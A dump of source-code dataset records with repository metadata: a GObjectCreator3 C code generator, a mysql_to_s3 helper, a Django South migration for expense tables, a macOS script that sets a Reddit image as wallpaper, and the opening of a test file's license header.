ThomasBollmeier/GObjectCreator3
|
src/gobjcreator3/codegen/c_code_generator.py
|
1
|
29821
|
from gobjcreator3.codegen.code_generator import CodeGenerator
from gobjcreator3.codegen.output import StdOut
from gobjcreator3.codegen.name_creator import NameCreator
from gobjcreator3.codegen.c_marshaller_generator import CMarshallerGenerator, CMarshallerNameCreator
from gobjcreator3.model.type import Type
from gobjcreator3.model.visibility import Visibility
from gobjcreator3.model.method import Parameter
from gobjcreator3.model.property import PropType, PropAccess
from gobjcreator3.model.ginterface import GInterface
import os
import re
import faberscriptorum
class CGenConfig(object):
def __init__(self):
self.generate_base_functions = False
self.generate_constructor = False
self.generate_setter_getter = False
self.verbose = False
self.header_text_file = ""
self.directory_per_module = True
class CCodeGenerator(CodeGenerator):
def __init__(self, root_module, origin, out=StdOut(), config=CGenConfig()):
CodeGenerator.__init__(self, root_module, origin, out)
self._config = config
self._dir_stack = []
self._cur_dir = ""
self._name_creator = NameCreator()
self._template_dir = os.path.dirname(__file__) + os.sep + "templates" + os.sep + "c"
self._refresh_template_processor()
self._regex_type_w_ptrs = re.compile(r"(\w+)(\s*)(\*+)")
def generate(self):
self._generate_module(self._root_module)
def _generate_module(self, module):
if self._config.directory_per_module:
if self._cur_dir:
self._cur_dir += os.sep + module.name
else:
self._cur_dir = module.name
self._dir_stack.append(self._cur_dir)
self._out.enter_dir(self._cur_dir)
for m in module.modules:
self._generate_module(m)
self._refresh_template_processor()
self._setup_module_symbols(module)
objs = [obj for obj in module.objects if obj.filepath_origin == self._origin]
for obj in objs:
self._setup_gobject_symbols(obj)
self._gen_object_header(obj)
self._gen_object_prot_header(obj)
self._gen_object_source(obj)
if obj.has_signals():
self._gen_object_marshallers(obj)
intfs = [intf for intf in module.interfaces if intf.filepath_origin == self._origin]
for intf in intfs:
self._setup_ginterface_symbols(intf)
self._gen_interface_header(intf)
self._gen_interface_source(intf)
if intf.signals:
self._gen_object_marshallers(intf)
enums = [enum for enum in module.enumerations if enum.filepath_origin == self._origin]
for enum in enums:
self._setup_genum_symbols(enum)
self._gen_enum_header(enum)
self._gen_enum_source(enum)
all_flags = [flags for flags in module.flags if flags.filepath_origin == self._origin]
for flags in all_flags:
self._setup_gflags_symbols(flags)
self._gen_flags_header(flags)
self._gen_flags_source(flags)
error_domains = [error_domain for error_domain in module.error_domains if error_domain.filepath_origin == self._origin]
for error_domain in error_domains:
self._setup_gerror_symbols(error_domain)
self._gen_error_header(error_domain)
if self._config.directory_per_module:
self._out.exit_dir(self._cur_dir)
self._dir_stack.pop()
if self._dir_stack:
self._cur_dir = self._dir_stack[-1]
else:
self._cur_dir = ""
def _gen_object_header(self, obj):
file_path = self._full_path(self._name_creator.create_obj_header_name(obj))
lines = self._get_lines_from_template("gobject_header.template", file_path)
self._create_text_file(file_path, lines)
def _gen_object_prot_header(self, obj):
if not obj.has_protected_members() and obj.is_final:
return
file_path = self._full_path(self._name_creator.create_obj_prot_header_name(obj))
lines = self._get_lines_from_template("gobject_header_prot.template", file_path)
self._create_text_file(file_path, lines)
def _gen_object_source(self, obj):
file_path = self._full_path(self._name_creator.create_obj_source_name(obj))
lines = self._get_lines_from_template("gobject_source.template", file_path)
self._create_text_file(file_path, lines)
def _gen_interface_header(self, intf):
file_path = self._full_path(self._name_creator.create_obj_header_name(intf))
lines = self._get_lines_from_template("ginterface_header.template", file_path)
self._create_text_file(file_path, lines)
def _gen_interface_source(self, intf):
file_path = self._full_path(self._name_creator.create_obj_source_name(intf))
lines = self._get_lines_from_template("ginterface_source.template", file_path)
self._create_text_file(file_path, lines)
def _gen_object_marshallers(self, clif):
is_interface = isinstance(clif, GInterface)
header_guard = "__"
modprefix = self._template_processor.getSymbol("MODULE_PREFIX")
if modprefix:
header_guard += modprefix + "_"
if not is_interface:
header_guard += self._template_processor.getSymbol("CLASS_NAME")
else:
header_guard += self._template_processor.getSymbol("INTF_NAME")
header_guard += "_MARSHALLER_H__"
if not is_interface:
prefix = self._template_processor.getSymbol("class_prefix")
else:
prefix = self._template_processor.getSymbol("intf_prefix")
signals = clif.get_signals()
generator = CMarshallerGenerator(
self._header_comment(),
header_guard,
prefix,
signals,
self._out
)
header_file_path = self._full_path(self._name_creator.create_obj_marshaller_header_name(clif))
if self._config.verbose:
print("generating %s..." % header_file_path, end="")
generator.generate_header(header_file_path)
if self._config.verbose:
print("done")
source_file_path = self._full_path(self._name_creator.create_obj_marshaller_source_name(clif))
if self._config.verbose:
print("generating %s..." % source_file_path, end="")
generator.generate_source(source_file_path)
if self._config.verbose:
print("done")
def _gen_enum_header(self, enum):
file_path = self._full_path(self._name_creator.create_filename_wo_suffix(enum) + ".h")
lines = self._get_lines_from_template("genum_header.template", file_path)
self._create_text_file(file_path, lines)
def _gen_enum_source(self, enum):
file_path = self._full_path(self._name_creator.create_filename_wo_suffix(enum) + ".c")
lines = self._get_lines_from_template("genum_source.template", file_path)
self._create_text_file(file_path, lines)
def _gen_flags_header(self, flags):
file_path = self._full_path(self._name_creator.create_filename_wo_suffix(flags) + ".h")
lines = self._get_lines_from_template("gflags_header.template", file_path)
self._create_text_file(file_path, lines)
def _gen_flags_source(self, flags):
file_path = self._full_path(self._name_creator.create_filename_wo_suffix(flags) + ".c")
lines = self._get_lines_from_template("gflags_source.template", file_path)
self._create_text_file(file_path, lines)
def _gen_error_header(self, error_domain):
file_path = self._full_path(self._name_creator.create_filename_wo_suffix(error_domain) + ".h")
lines = self._get_lines_from_template("gerror_header.template", file_path)
self._create_text_file(file_path, lines)
def _full_path(self, basename):
if self._cur_dir:
return self._cur_dir + os.sep + basename
else:
return basename
def _create_text_file(self, file_path, lines):
if self._config.verbose:
print("generating %s..." % file_path, end="")
self._out.visit_text_file(file_path, lines)
if self._config.verbose:
print("done")
def _get_lines_from_template(self, template_file, file_path):
self._out.prepare_file_creation(file_path, self._template_processor)
template_path = self._template_dir + os.sep + template_file
template_path = os.path.abspath(template_path)
out_buffer = self._template_processor.createStringOut()
self._template_processor.createCode(template_path, out_buffer)
lines = out_buffer.content.split(os.linesep)
# Remove adjacent empty lines:
res = []
prev = None
for line in lines:
line = line.rstrip()
if line:
res.append(line)
else:
if prev is None or prev:
res.append(line)
prev = line
return res
def _refresh_template_processor(self):
self._template_processor = faberscriptorum.API()
self._template_processor.setEditableSectionStyle(self._template_processor.Language.C)
self._template_processor.setIncludePath([self._template_dir])
self._template_processor["header_comment"] = self._header_comment()
self._template_processor["config"] = self._config
self._template_processor["TRUE"] = True
self._template_processor["FALSE"] = False
self._template_processor["PUBLIC"] = Visibility.PUBLIC
self._template_processor["PROTECTED"] = Visibility.PROTECTED
self._template_processor["PRIVATE"] = Visibility.PRIVATE
self._template_processor["OBJECT"] = Type.OBJECT
self._template_processor["INTERFACE"] = Type.INTERFACE
self._template_processor["type_name"] = self._name_creator.create_full_type_name
self._template_processor["TYPE_MACRO"] = self._name_creator.create_type_macro
self._template_processor["CAST_MACRO"] = self._name_creator.create_cast_macro
self._template_processor["increment"] = self._increment
self._template_processor["is_empty"] = self._is_empty
self._template_processor["is_none"] = self._is_none
self._template_processor["literal_trim"] = self._literal_trim
self._template_processor["length"] = self._length
self._template_processor["to_upper"] = self._to_upper
self._template_processor["to_lower"] = self._to_lower
self._template_processor["rearrange_asterisk"] = self._rearrange_asterisk
self._template_processor["method_basename"] = self._method_basename
self._template_processor["method_result"] = self._method_result
self._template_processor["method_signature"] = self._method_signature
self._template_processor["method_signature_by_name"] = self._method_signature_by_name
self._template_processor["method_by_name"] = self._method_by_name
self._template_processor["method_call_args"] = self._method_call_args
self._template_processor["method_def_class"] = self._method_def_class
self._template_processor["method_def_class_cast"] = self._method_def_class_cast
def _setup_module_symbols(self, module):
camel_case_prefix = module.name.capitalize()
curmod = module
while curmod.module:
curmod = curmod.module
if curmod.name:
camel_case_prefix = curmod.name.capitalize() + camel_case_prefix
prefix = self._name_creator.replace_camel_case(camel_case_prefix, "_")
self._template_processor["module_prefix"] = self._module_prefix(module)
self._template_processor["MODULE_PREFIX"] = prefix.upper()
self._template_processor["ModulePrefix"] = camel_case_prefix
self._template_processor["filename_wo_suffix"] = self._name_creator.create_filename_wo_suffix
def _setup_gobject_symbols(self, obj):
self._template_processor["class"] = obj
self._template_processor["ClassName"] = obj.name
self._template_processor["CLASS_NAME"] = self._name_creator.replace_camel_case(obj.name, "_").upper()
self._template_processor["FullClassName"] = self._template_processor.getSymbol("ModulePrefix") + obj.name
prefix = obj.cfunc_prefix or self._name_creator.replace_camel_case(obj.name, "_").lower()
module_prefix = self._template_processor.getSymbol("module_prefix")
if module_prefix:
prefix = module_prefix + "_" + prefix
self._template_processor["class_prefix"] = prefix
self._template_processor["protected_header"] = self._name_creator.create_obj_prot_header_name
self._template_processor["marshaller_header"] = self._name_creator.create_obj_marshaller_header_name
self._template_processor["hasProtectedMembers"] = obj.has_protected_members()
self._template_processor["PROP_NAME"] = self._name_creator.create_property_enum_value
self._template_processor["prop_tech_name"] = self._name_creator.create_property_tech_name
self._template_processor["PropType"] = PropType
self._template_processor["PropAccess"] = PropAccess
self._template_processor["prop_value"] = self._property_value
self._template_processor["prop_gtype"] = self._property_gtype
self._template_processor["prop_flags"] = self._property_flags
self._template_processor["prop_setter_section"] = self._property_setter_section
self._template_processor["prop_getter_section"] = self._property_getter_section
self._template_processor["prop_set_section"] = self._property_setter_section
self._template_processor["prop_get_section"] = self._property_getter_section
self._template_processor["is_prop_init_required"] = self._is_property_init_required
self._template_processor["signal_tech_name"] = self._signal_technical_name
self._template_processor["signal_section_defhandler"] = self._signal_section_defhandler
if obj.has_signals():
self._marshaller_names = CMarshallerNameCreator(prefix)
self._template_processor["marshaller_func"] = self._marshaller_names.create_marshaller_name
else:
self._marshaller_names = None
self._template_processor["interface_impl_funcname"] = self._interface_impl_funcname
def _setup_ginterface_symbols(self, intf):
self._template_processor["intf"] = intf
self._template_processor["INTF_NAME"] = self._name_creator.replace_camel_case(intf.name, "_").upper()
prefix = intf.cfunc_prefix or self._name_creator.replace_camel_case(intf.name, "_").lower()
module_prefix = self._template_processor.getSymbol("module_prefix")
if module_prefix:
prefix = module_prefix + "_" + prefix
self._template_processor["intf_prefix"] = prefix
if intf.signals:
self._marshaller_names = CMarshallerNameCreator(prefix)
self._template_processor["marshaller_func"] = self._marshaller_names.create_marshaller_name
else:
self._marshaller_names = None
def _setup_genum_symbols(self, enum):
self._template_processor["enum"] = enum
self._template_processor["ENUM_NAME"] = self._name_creator.replace_camel_case(enum.name, "_").upper()
self._template_processor["FullEnumName"] = self._template_processor.getSymbol("ModulePrefix") + enum.name
prefix = self._name_creator.replace_camel_case(enum.name, "_").lower()
module_prefix = self._template_processor.getSymbol("module_prefix")
if module_prefix:
prefix = module_prefix + "_" + prefix
self._template_processor["enum_prefix"] = prefix
def _setup_gflags_symbols(self, flags):
self._template_processor["flags"] = flags
prefix = self._name_creator.replace_camel_case(flags.name, "_").lower()
module_prefix = self._template_processor.getSymbol("module_prefix")
if module_prefix:
prefix = module_prefix + "_" + prefix
self._template_processor["flags_prefix"] = prefix
def _setup_gerror_symbols(self, error_domain):
self._template_processor["error_domain"] = error_domain
prefix = self._name_creator.replace_camel_case(error_domain.name, "_").lower()
module_prefix = self._template_processor.getSymbol("module_prefix")
if module_prefix:
prefix = module_prefix + "_" + prefix
self._template_processor["error_domain_prefix"] = prefix
def _header_comment(self):
if not self._config.header_text_file:
return """/*
* This file has been automatically generated by GObjectCreator3
* (see https://github.com/ThomasBollmeier/GObjectCreator3 for details)
*/
"""
else:
res = ""
f = open(self._config.header_text_file)
lines = f.readlines()
f.close
for line in lines:
res += line
return res
def _increment(self, value):
return value + 1
def _is_empty(self, data):
return bool(data) == False
def _is_none(self, data):
return data is None
def _to_upper(self, text):
return text.upper()
def _to_lower(self, text):
return text.lower()
def _literal_trim(self, text):
if len(text) > 2:
return text[1:-1]
else:
return ""
def _length(self, data):
try:
return len(data)
except TypeError as error:
raise error
def _method_result(self, method):
result_type = "void"
for p in method.parameters:
type_name = self._name_creator.create_full_type_name(p.type)
if isinstance(p.type, Type) and ( p.type.category == Type.OBJECT or p.type.category == Type.INTERFACE ):
type_name += "*"
if "const" in p.modifiers:
type_name = "const " + type_name
if p.direction == Parameter.OUT:
result_type = type_name
break
return self._rearrange_asterisk(result_type)
def _method_basename(self,
cls,
method_info
):
method_or_name, intf = method_info
if not isinstance(method_or_name, str):
res = method_or_name.name
else:
res = method_or_name
if intf:
method_prefix = intf.cfunc_prefix or intf.name.lower()
mod_prefix = self._module_prefix_relative(intf.module, cls.module)
if mod_prefix:
method_prefix = mod_prefix + "_" + method_prefix
res = method_prefix + "_" + res
return res
def _method_signature(self,
cls,
method,
suppress_param_names=False,
insert_line_breaks=True,
indent_level=1,
instance_name="self"
):
res = ""
params = []
for p in method.parameters:
type_name = self._name_creator.create_full_type_name(p.type)
if isinstance(p.type, Type) and ( p.type.category == Type.OBJECT or p.type.category == Type.INTERFACE ):
type_name += "*"
if "const" in p.modifiers:
type_name = "const " + type_name
if p.direction != Parameter.OUT:
params.append((type_name, p.name))
if not method.is_static:
cls_type = self._name_creator.create_full_type_name(cls)
params.insert(0, (cls_type + "*", instance_name))
if len(params) == 0:
res = "void"
elif len(params) == 1:
res = params[0][0]
if not suppress_param_names:
res = self._rearrange_asterisk(res, params[0][1])
else:
for param in params:
if res:
res += ", "
if insert_line_breaks:
res += "\n"
res += indent_level * "\t"
typename = param[0]
if not suppress_param_names:
res += self._rearrange_asterisk(typename, param[1])
else:
res += typename
if insert_line_breaks:
res += "\n"
res += indent_level * "\t"
return res
def _method_call_args(self,
method,
insert_line_breaks = True,
indent_level = 1,
instance_name = "self"
):
args = [p.name for p in method.parameters if p.direction != Parameter.OUT]
if not method.is_static:
args.insert(0, instance_name)
num_args = len(args)
if num_args == 0:
res = ""
elif num_args == 1:
res = args[0]
else:
res = ""
for arg in args:
if res:
res += ","
if insert_line_breaks:
res += "\n"
res += indent_level * "\t"
res += arg
if insert_line_breaks:
res += "\n"
res += indent_level * "\t"
return res
def _method_signature_by_name(self,
cls,
method_name,
suppress_param_names=False,
insert_line_breaks=True,
indent_level=1,
instance_name="self"
):
minfo = cls.get_method_info(method_name)
return self._method_signature(
minfo.def_origin,
minfo.method,
suppress_param_names,
insert_line_breaks,
indent_level,
instance_name
)
def _method_by_name(self, cls, method_name, intf=None):
minfo = cls.get_method_info(method_name, intf)
return minfo.method
def _method_def_class(self, cls, method_name, intf=None):
minfo = cls.get_method_info(method_name, intf)
if minfo:
return minfo.def_origin
else:
raise Exception("No class found for method '%s'" % method_name)
def _method_def_class_cast(self, cls, method_name, intf=None):
minfo = cls.get_method_info(method_name, intf)
defcls = minfo.def_origin
class_name = self._name_creator.replace_camel_case(defcls.name, "_").upper()
module_prefix = ""
module = defcls.module
while module and module.name:
if module_prefix:
module_prefix = "_" + module_prefix
module_prefix = module.name.upper() + module_prefix
module = module.module
res = class_name + "_CLASS"
if module_prefix:
res = module_prefix + "_" + res
return res
def _signal_technical_name(self, signal):
return signal.name.replace("-", "_")
def _signal_section_defhandler(self, signal):
return "default_handler_" + self._signal_technical_name(signal)
def _rearrange_asterisk(self, typename, parname=None):
match = self._regex_type_w_ptrs.match(typename)
if match:
if parname:
typename = match.group(1)
parname = match.group(3) + parname
else:
typename = match.group(1) + " " + match.group(3)
if parname:
return typename + " " + parname
else:
return typename
def _property_flags(self, prop):
flags = ""
for access_mode in prop.access:
if flags:
flags += "|"
flags += {
PropAccess.READ: "G_PARAM_READABLE",
PropAccess.WRITE: "G_PARAM_WRITABLE",
PropAccess.INIT: "G_PARAM_CONSTRUCT",
PropAccess.INIT_ONLY: "G_PARAM_CONSTRUCT_ONLY"
}[access_mode]
return flags
def _property_value(self, val):
if val.literal:
return val.literal
elif val.number_info:
if not val.number_info.decimals:
return "%d" % val.number_info.digits
else:
return "%d.%d" % (val.number_info.digits, val.number_info.decimals)
elif val.code_info:
enum_name = self._name_creator.create_full_type_name(val.code_info.enumeration)
enum_name = self._name_creator.replace_camel_case(enum_name, "_").upper()
return enum_name + "_" + val.code_info.code_name
elif val.boolean is not None:
return val.boolean and "TRUE" or "FALSE"
def _property_gtype(self, gtype_value):
if gtype_value.gtype_id:
return gtype_value.gtype_id
else:
return self._name_creator.create_type_macro(gtype_value.type)
def _property_setter_section(self, prop):
return "setter_" + prop.name.replace("-", "_").lower()
def _property_getter_section(self, prop):
return "getter_" + prop.name.replace("-", "_").lower()
def _property_set_section(self, prop):
return "set_" + prop.name.replace("-", "_").lower()
def _property_get_section(self, prop):
return "get_" + prop.name.replace("-", "_").lower()
def _interface_impl_funcname(self, cls, intf, method_name):
method_prefix = intf.cfunc_prefix or intf.name.lower()
module_predix = self._module_prefix_relative(intf.module, cls.module)
if module_predix:
method_prefix = module_predix + "_" + method_prefix
return method_prefix + "_" + method_name
def _is_property_init_required(self, obj):
if obj.get_properties():
return True
for intf in obj.interfaces:
if intf.properties:
return True
return False
def _module_prefix(self, module):
res = module.cfunc_prefix or module.name.lower()
curmod = module
while curmod.module:
curmod = curmod.module
tmp = curmod.cfunc_prefix or curmod.name.lower()
if tmp:
res = tmp + "_" + res
return res
def _module_prefix_relative(self, module, root):
res = ""
abspath_module = self._get_abs_module_path(module)
abspath_root = self._get_abs_module_path(root)
len_rootpath = len(abspath_root)
relpath = []
for idx, m in enumerate(abspath_module):
if not relpath and idx < len_rootpath and m == abspath_root[idx]:
continue
relpath.append(m)
for m in relpath:
if res:
res += "_"
res += m.cfunc_prefix or m.name.lower()
return res
def _get_abs_module_path(self, module):
res = [module]
curmod = module
while curmod.module:
curmod = curmod.module
res.insert(0, curmod)
return res
|
apache-2.0
| 763,292,699,945,116,500
| 36.464824
| 127
| 0.539653
| false
| 4.250428
| true
| false
| false
|
klahnakoski/MySQL-to-S3
|
mysql_to_s3/__init__.py
|
1
|
1965
|
# encoding: utf-8
#
#
# This Source Code Form is subject to the terms of the Mozilla Public
# License, v. 2.0. If a copy of the MPL was not distributed with this file,
# You can obtain one at http://mozilla.org/MPL/2.0/.
#
# Author: Kyle Lahnakoski (kyle@lahnakoski.com)
#
from __future__ import absolute_import
from __future__ import division
from __future__ import unicode_literals
from mo_dots import wrap
from mo_logs import strings
from pyLibrary.aws import s3
def _key2etl(key):
"""
CONVERT S3 KEY TO ETL HEADER
S3 NAMING CONVENTION: a.b.c WHERE EACH IS A STEP IN THE ETL PROCESS
HOW TO DEAL WITH a->b AS AGGREGATION? b:a.c? b->c is agg: a.c:b
"""
key = s3.strip_extension(key)
tokens = []
s = 0
i = strings.find(key, [":", "."])
while i < len(key):
tokens.append(key[s:i])
tokens.append(key[i])
s = i + 1
i = strings.find(key, [":", "."], s)
tokens.append(key[s:i])
_reverse_aggs(tokens)
# tokens.reverse()
source = {
"id": format_id(tokens[0])
}
for i in range(2, len(tokens), 2):
source = {
"id": format_id(tokens[i]),
"source": source,
"type": "join" if tokens[i - 1] == "." else "agg"
}
return wrap(source)
def _reverse_aggs(seq):
# SHOW AGGREGATION IN REVERSE ORDER (ASSUME ONLY ONE)
for i in range(1, len(seq), 2):
if seq[i] == ":":
seq[i - 1], seq[i + 1] = seq[i + 1], seq[i - 1]
def format_id(value):
"""
:param value:
:return: int() IF POSSIBLE
"""
try:
return int(value)
except Exception:
return unicode(value)
def lt(l, r):
"""
:param l: left key
:param r: right key
:return: True if l<r
"""
if r is None or l is None:
return True
for ll, rr in zip(l, r):
if ll < rr:
return True
elif ll > rr:
return False
return False
|
mpl-2.0
| 562,157,114,475,749,760
| 21.586207
| 75
| 0.553181
| false
| 3.094488
| false
| false
| false
|
gamnor/olhoneles
|
montanha/migrations/0007_auto__add_pernaturebyyear__add_pernature.py
|
1
|
10393
|
# -*- coding: utf-8 -*-
from south.utils import datetime_utils as datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Adding model 'PerNatureByYear'
db.create_table(u'montanha_pernaturebyyear', (
(u'id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
('institution', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['montanha.Institution'])),
('year', self.gf('django.db.models.fields.IntegerField')()),
('nature', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['montanha.ExpenseNature'])),
('expensed', self.gf('django.db.models.fields.DecimalField')(max_digits=10, decimal_places=2)),
))
db.send_create_signal(u'montanha', ['PerNatureByYear'])
# Adding model 'PerNature'
db.create_table(u'montanha_pernature', (
(u'id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
('institution', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['montanha.Institution'])),
('legislature', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['montanha.Legislature'], null=True, blank=True)),
('date_start', self.gf('django.db.models.fields.DateField')()),
('date_end', self.gf('django.db.models.fields.DateField')()),
('nature', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['montanha.ExpenseNature'])),
('expensed', self.gf('django.db.models.fields.DecimalField')(max_digits=10, decimal_places=2)),
))
db.send_create_signal(u'montanha', ['PerNature'])
def backwards(self, orm):
# Deleting model 'PerNatureByYear'
db.delete_table(u'montanha_pernaturebyyear')
# Deleting model 'PerNature'
db.delete_table(u'montanha_pernature')
models = {
u'montanha.archivedexpense': {
'Meta': {'object_name': 'ArchivedExpense'},
'collection_run': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['montanha.CollectionRun']"}),
'date': ('django.db.models.fields.DateField', [], {}),
'expensed': ('django.db.models.fields.DecimalField', [], {'max_digits': '10', 'decimal_places': '2'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'mandate': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['montanha.Mandate']"}),
'nature': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['montanha.ExpenseNature']"}),
'number': ('django.db.models.fields.CharField', [], {'max_length': '512'}),
'original_id': ('django.db.models.fields.CharField', [], {'max_length': '512', 'null': 'True', 'blank': 'True'}),
'supplier': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['montanha.Supplier']"}),
'value': ('django.db.models.fields.DecimalField', [], {'null': 'True', 'max_digits': '10', 'decimal_places': '2', 'blank': 'True'})
},
u'montanha.collectionrun': {
'Meta': {'object_name': 'CollectionRun'},
'date': ('django.db.models.fields.DateField', [], {}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'legislature': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['montanha.Legislature']"})
},
u'montanha.expense': {
'Meta': {'object_name': 'Expense'},
'date': ('django.db.models.fields.DateField', [], {}),
'expensed': ('django.db.models.fields.DecimalField', [], {'max_digits': '10', 'decimal_places': '2'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'mandate': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['montanha.Mandate']"}),
'nature': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['montanha.ExpenseNature']"}),
'number': ('django.db.models.fields.CharField', [], {'max_length': '512'}),
'original_id': ('django.db.models.fields.CharField', [], {'max_length': '512', 'null': 'True', 'blank': 'True'}),
'supplier': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['montanha.Supplier']"}),
'value': ('django.db.models.fields.DecimalField', [], {'null': 'True', 'max_digits': '10', 'decimal_places': '2', 'blank': 'True'})
},
u'montanha.expensenature': {
'Meta': {'object_name': 'ExpenseNature'},
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '512'}),
'original_id': ('django.db.models.fields.CharField', [], {'max_length': '512', 'null': 'True', 'blank': 'True'})
},
u'montanha.institution': {
'Meta': {'object_name': 'Institution'},
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'logo': ('django.db.models.fields.files.ImageField', [], {'max_length': '100', 'null': 'True', 'blank': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '2048'}),
'siglum': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '10'})
},
u'montanha.legislator': {
'Meta': {'object_name': 'Legislator'},
'about': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'date_of_birth': ('django.db.models.fields.DateField', [], {'null': 'True', 'blank': 'True'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'null': 'True', 'blank': 'True'}),
'gender': ('django.db.models.fields.CharField', [], {'max_length': '1', 'null': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '2048'}),
'original_id': ('django.db.models.fields.TextField', [], {}),
'picture': ('django.db.models.fields.files.ImageField', [], {'max_length': '100', 'null': 'True', 'blank': 'True'}),
'site': ('django.db.models.fields.URLField', [], {'max_length': '200', 'null': 'True', 'blank': 'True'})
},
u'montanha.legislature': {
'Meta': {'object_name': 'Legislature'},
'date_end': ('django.db.models.fields.DateField', [], {'null': 'True', 'blank': 'True'}),
'date_start': ('django.db.models.fields.DateField', [], {}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'institution': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['montanha.Institution']"}),
'original_id': ('django.db.models.fields.CharField', [], {'max_length': '512', 'null': 'True', 'blank': 'True'})
},
u'montanha.mandate': {
'Meta': {'object_name': 'Mandate'},
'date_end': ('django.db.models.fields.DateField', [], {'null': 'True', 'blank': 'True'}),
'date_start': ('django.db.models.fields.DateField', [], {}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'legislator': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['montanha.Legislator']"}),
'legislature': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['montanha.Legislature']"}),
'party': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['montanha.PoliticalParty']", 'null': 'True', 'blank': 'True'})
},
u'montanha.pernature': {
'Meta': {'object_name': 'PerNature'},
'date_end': ('django.db.models.fields.DateField', [], {}),
'date_start': ('django.db.models.fields.DateField', [], {}),
'expensed': ('django.db.models.fields.DecimalField', [], {'max_digits': '10', 'decimal_places': '2'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'institution': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['montanha.Institution']"}),
'legislature': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['montanha.Legislature']", 'null': 'True', 'blank': 'True'}),
'nature': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['montanha.ExpenseNature']"})
},
u'montanha.pernaturebyyear': {
'Meta': {'object_name': 'PerNatureByYear'},
'expensed': ('django.db.models.fields.DecimalField', [], {'max_digits': '10', 'decimal_places': '2'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'institution': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['montanha.Institution']"}),
'nature': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['montanha.ExpenseNature']"}),
'year': ('django.db.models.fields.IntegerField', [], {})
},
u'montanha.politicalparty': {
'Meta': {'object_name': 'PoliticalParty'},
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'logo': ('django.db.models.fields.files.ImageField', [], {'max_length': '100', 'null': 'True', 'blank': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '2048', 'null': 'True', 'blank': 'True'}),
'siglum': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '10'}),
'wikipedia': ('django.db.models.fields.URLField', [], {'max_length': '200', 'null': 'True', 'blank': 'True'})
},
u'montanha.supplier': {
'Meta': {'object_name': 'Supplier'},
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'identifier': ('django.db.models.fields.CharField', [], {'max_length': '256'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '200'})
}
}
complete_apps = ['montanha']
|
agpl-3.0
| -336,951,130,467,373,200
| 68.293333
| 151
| 0.560185
| false
| 3.423254
| false
| false
| false
|
roccoma504/reddit_wallpaper
|
reddit_mac_wallpaper.py
|
1
|
1030
|
#!/usr/bin/python
# This script changes the wallpaper of the current OSX desktop. It will change the wallpaper of the desktop on each screen but not each desktop.
from AppKit import NSWorkspace, NSScreen
from Foundation import NSURL
import os
import praw
import urllib
# Define the reddit object.
r = praw.Reddit(user_agent='User-Agent: osx:com.frocco.reddit_wallpaper:v0.1 (by /u/roclobster)')
# Retrieve and save the top image of /r/WQHD_Wallpaper
testfile = urllib.URLopener()
testfile.retrieve(list(r.get_subreddit('WQHD_Wallpaper').get_top(limit=1))[0].url, "reddit_wallpaper.jpg")
# Generate a fileURL for the desktop picture
file_url = NSURL.fileURLWithPath_(os.getcwd() + "/reddit_wallpaper.jpg")
# Get shared workspace
ws = NSWorkspace.sharedWorkspace()
# Iterate over all screens
for screen in NSScreen.screens():
# Tell the workspace to set the desktop picture
(result, error) = ws.setDesktopImageURL_forScreen_options_error_(file_url, screen, {}, None)
if error:
print error
exit(-1)
|
mit
| 7,633,890,986,158,433,000
| 33.366667
| 144
| 0.74466
| false
| 3.322581
| false
| false
| false
|
mulkieran/pyblk
|
tests/test_utils.py
|
1
|
1744
|
# -*- coding: utf-8 -*-
# Copyright (C) 2015 Red Hat, Inc.
#
# This copyrighted material is made available to anyone wishing to use,
# modify, copy, or redistribute it subject to the terms and conditions of
# the GNU General Public License v.2, or (at your option) any later version.
# This program is distributed in the hope that it will be useful, but WITHOUT
# ANY WARRANTY expressed or implied, including the implied warranties of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General
# Public License for more details. You should have received a copy of the
